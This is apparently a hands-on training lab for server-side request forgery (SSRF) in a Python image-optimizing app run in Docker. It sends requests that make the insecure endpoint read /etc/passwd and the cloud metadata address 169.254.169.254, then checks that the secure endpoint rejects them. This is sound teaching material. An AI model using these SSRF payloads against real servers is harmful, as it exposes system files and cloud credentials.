- Step 1: Open terminal and change to lab directory
cd /root/ssrf-urllib
- Step 2: Build and run the docker
docker build -t app .
docker run -p 5000:5000 -it app
- Step 1: Now attack to see if you can read internal sensitive files
http GET http://localhost:5000/insecure/optimize url=file:///etc/passwd | jq -r '.data.raw_data' | base64 --decode
You should see the password entries dumped in plain text
- Step 2: Now attack to see if you can read internal sensitive url's
http GET http://localhost:5000/insecure/optimize url=http://169.254.169.254 | jq -r '.data.raw_data' | base64 --decode
You should see the API returning successful output here also
- Step 1: Now attack to see if you can read internal sensitive files
http GET http://localhost:5000/secure/optimize url=file:///etc/passwd
You should see the response as Invalid URL
- Step 2: Now attack to see if you can read internal sensitive url's
http GET http://localhost:5000/secure/optimize url=http://169.254.169.254
You should see the response as Invalid URL